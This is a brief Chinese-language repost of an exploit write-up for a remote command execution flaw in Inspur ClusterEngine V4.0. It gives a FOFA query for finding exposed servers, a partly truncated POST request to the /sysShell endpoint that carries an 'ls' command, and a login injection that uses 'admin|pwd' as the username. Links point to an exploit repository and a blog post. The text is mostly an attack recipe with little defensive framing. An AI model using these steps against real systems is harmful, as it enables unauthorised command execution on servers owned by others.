1、浪潮ClusterEngineV4.0 任意命令執行

影響版本 ClusterEngineV4.0

2、漏洞影響

遠程代碼執行

fofa語句 title='TSCEV4.0'

抓包構造exp

POST /sysShel

......

op=doPlease&node=cu01&command=ls

登錄抓包，閉合username參數

使用;進行命令分割

用戶名輸入admin|pwd,密碼任意

成功登錄

https://github.com/NS-Sp4ce/Inspur/tree/master/ClusterEngineV4.0%20Vul

https://blog.csdn.net/DUANYU23/article/details/115499280

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 任意命令執行深信服EDR命令執行&任意用戶登錄 PbootCMS任意代碼執行任意代碼執行漏洞滲透技巧——如何逃逸Linux的受限制shell執行任意命令 CVE-2018-19518 PHP imap_open函數任意命令執行漏洞復現我寫了一個腳本，可在“任意”服務器上執行命令！ Fastjson 1.2.24、47 反序列化導致任意命令執行漏洞復現 fastjson 1.2.24反序列化導致任意命令執行漏洞分析記錄關於Fastjson 1.2.24 反序列化導致任意命令執行漏洞